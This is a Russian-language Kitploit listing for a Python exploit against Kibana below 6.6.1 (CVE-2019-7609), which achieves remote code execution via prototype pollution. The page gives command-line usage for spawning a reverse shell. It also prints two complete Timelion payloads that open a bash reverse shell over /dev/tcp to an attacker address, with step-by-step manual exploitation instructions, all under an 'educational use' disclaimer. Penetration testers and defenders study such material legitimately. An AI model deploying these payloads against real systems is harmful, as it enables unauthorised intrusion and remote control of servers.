Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-7069-POC — Python 3 эксплойт для Kibana < 6.6.1 RCE (CVE-2019-7609) через prototype pollution, с автоматическим определением версии и опциональным reverse shell. | Kitploit
Инструменты/GitHubGitHub/caelumisme/cve-2019-7069-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubcaelumisme/cve-2019-7069-poc

CVE-2019-7069-POC

Python 3 эксплойт для Kibana < 6.6.1 RCE (CVE-2019-7609) через prototype pollution, с автоматическим определением версии и опциональным reverse shell.

Репозиторий
111 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Kibana < 6.6.1 Эксплуатация удаленного выполнения кода (CVE-2019-7609)

Exploit Banner

🚨 Образовательный эксплойт RCE 🚨

Автор: LandGrey (Python3 Refactor by [Your Name])
Ссылка: Exploit-DB 46651
CVE: CVE-2019-7609


⚠️ Отказ от ответственности:
Этот скрипт предназначен только для образовательных целей и авторизованного тестирования на проникновение. Не используйте его на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Автор и участники не несут ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.


🎯 Что это?

Это эксплойт-скрипт на Python 3 для уязвимости удаленного выполнения кода в Kibana версий < 6.6.1. Он использует недостаток загрязнения прототипа для выполнения произвольных команд, включая запуск обратной оболочки, на уязвимом экземпляре Kibana.

🕹️ Возможности

  • Автоматически определяет версию Kibana
  • Проверяет статус уязвимости
  • Опционально запускает обратную оболочку на ваш слушатель
  • Чистый, интерактивный вывод в терминале
  • Полностью совместим с Python 3

📚 Ссылки

  • Exploit-DB Entry 46651
  • Kibana Official Site
  • CVE-2019-7609

🚀 Использование

python3 kibana_exploit.py -u http://target-kibana:5601

Для запуска обратной оболочки:

python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT

Пример

python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444

🛠️ Требования

  • Python 3.x
  • библиотека requests
  • библиотека packaging

Установите зависимости с помощью:

pip install requests packaging

💡 Ручная эксплуатация через Timelion

Вы также можете вручную эксплуатировать эту уязвимость с помощью визуализатора Timelion в Kibana:

  1. Откройте Kibana
  2. Вставьте одну из следующих полезных нагрузок в визуализатор Timelion
  3. Нажмите Run
  4. На левой панели нажмите Canvas
  5. Ваша обратная оболочка должна появиться! :)

Полезная нагрузка от securityMB:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

Полезная нагрузка от chybeta:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

Замените 192.168.1.100 и 4444 на свой IP-адрес и порт слушателя.


🧩 Как это работает

  • Определяет версию Kibana через HTTP-запрос
  • Проверяет, уязвима ли цель для CVE-2019-7609
  • Эксплуатирует загрязнение прототипа для выполнения произвольных команд
  • Опционально запускает обратную оболочку на указанный хост и порт

🎨 Вывод

Скрипт предоставляет четкий пошаговый вывод для обнаружения, проверки и эксплуатации, что делает его легким для понимания и интересным в использовании!


👾 Для веселья и обучения

Этот скрипт — отличный способ узнать о загрязнении прототипа, удаленном выполнении кода и методах тестирования на проникновение. Используйте его ответственно и всегда с разрешения!


📝 Лицензия

Этот проект предназначен только для образовательных целей. Без гарантий, без обязательств. Взламывайте этично, оставайтесь любопытными и получайте удовольствие!

Скачать инструмент